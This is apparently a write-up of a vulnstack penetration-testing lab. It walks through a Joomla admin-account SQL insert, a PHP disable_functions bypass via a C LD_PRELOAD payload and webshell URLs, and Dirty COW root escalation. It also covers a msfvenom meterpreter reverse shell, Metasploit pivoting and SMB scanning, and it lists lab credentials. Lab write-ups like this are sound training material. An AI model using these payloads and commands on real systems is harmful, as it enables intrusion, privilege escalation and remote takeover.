Target VM download: http://vulnstack.qiyuanxuetang.net/vuln/detail/5/
Writeup reference: https://www.cnblogs.com/wkzb/p/13281772.html
If every VM on my machine runs with its originally allocated memory there is not enough RAM, so to cut memory usage I could only look up the passwords first (sob).
win7   123qwe!ASD
08     123qwe!ASD
win10  zxcASDqw123!!
To start the nginx service, just run the nginx command (it was running originally, but changing the VM's memory required a shutdown).
-- Joomla users table (table prefix am2zu_). This is the admin-recovery recipe from the Joomla docs:
-- the hash is the documented one for the password 'secret', and group_id 8 is the Super Users group.
INSERT INTO `am2zu_users` (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('Administrator2', 'admin2', 'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `am2zu_user_usergroup_map` (`user_id`, `group_id`) VALUES (LAST_INSERT_ID(), '8');
https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
http://172.16.45.136/templates/beez3/bypass_disablefunc.php?cmd=whoami&outpath=/tmp/baji&sopath=/var/www/html/templates/beez3/bypass_disablefunc_x64.so
http://172.16.45.136/templates/beez3/bypass_disablefunc.php?cmd=ifconfig&outpath=/tmp/baji&sopath=/var/www/html/templates/beez3/bypass_disablefunc_x64.so
http://172.16.45.136/templates/beez3/bypass_disablefunc.php?cmd=cat%20/proc/version&outpath=/tmp/baji&sopath=/var/www/html/templates/beez3/bypass_disablefunc_x64.so
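The URLs above work because PHP's disable_functions blocks system()/exec() but normally leaves putenv() and mail() alone: the PHP side sets EVIL_CMDLINE and LD_PRELOAD in the environment and calls mail(), which forks a sendmail child; the loader maps the .so into that child and runs its constructor before main(). The following is an added example of such a preload payload, written for this page and not code from the bypass_disablefunc_via_LD_PRELOAD repository; the helper name build_cmdline and the env variable name EVIL_CMDLINE are assumptions chosen for illustration.

```c
/* Added example (not the repository's own code): a minimal LD_PRELOAD
 * payload for the disable_functions bypass.
 *
 * The PHP side does roughly the following (shown here as a comment only):
 *   putenv("EVIL_CMDLINE=" . $cmd . " > " . $outpath . " 2>&1");
 *   putenv("LD_PRELOAD=" . $sopath);
 *   mail("", "", "", "");   // forks sendmail; the child inherits the env
 * and then reads $outpath back to the browser.
 *
 * Build: gcc -shared -fPIC bypass.c -o bypass_disablefunc_x64.so
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Build "<cmd> > <outpath> 2>&1" into buf. Returns the length written,
 * or -1 if buf is too small. Kept free of side effects so it can be
 * checked on its own; the PHP side builds the same string. */
int build_cmdline(const char *cmd, const char *outpath, char *buf, size_t n)
{
    int len = snprintf(buf, n, "%s > %s 2>&1", cmd, outpath);
    if (len < 0 || (size_t)len >= n)
        return -1;
    return len;
}

/* Constructor: runs inside whichever process the loader injected us into
 * (the sendmail child spawned by mail()). LD_PRELOAD is unset first so the
 * shell that system() spawns does not load this .so again and recurse.
 * Does nothing when EVIL_CMDLINE is absent, e.g. when loaded by accident. */
__attribute__((constructor)) static void preload(void)
{
    const char *cmdline = getenv("EVIL_CMDLINE");
    if (cmdline == NULL)
        return;
    unsetenv("LD_PRELOAD");
    system(cmdline);
}
```

The outpath in the page's URLs (/tmp/baji) is only the redirect target for the command's stdout/stderr; the .so itself never touches the web root, which is why the sopath can point at a file uploaded anywhere the PHP process can read.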
gcc -pthread dirty.c -o dirty -lcrypt    # compile firefart's Dirty COW PoC, which adds a root user "firefart" to /etc/passwd
su firefart                               # password: baji
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=4444 -f elf > shell.elf    # LHOST must be the address the handler listens on (the handler below uses 172.16.45.129; the two have to agree)
msfconsole> set payload linux/x86/meterpreter/reverse_tcp
msfconsole> set lhost 172.16.45.129
msfconsole> set lport 4444
run autoroute -s 192.168.93.0/24
background
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.93.0/24
exploit
192.168.93.10   Windows Server 2012
192.168.93.20   Windows Server 2008
192.168.93.30   Windows 7
Brute-forcing the 2008 password ran into a problem; it always hit readtimeout, so for now I'll go with the results of other masters: the Windows 2008 password is 123qwe!ASD.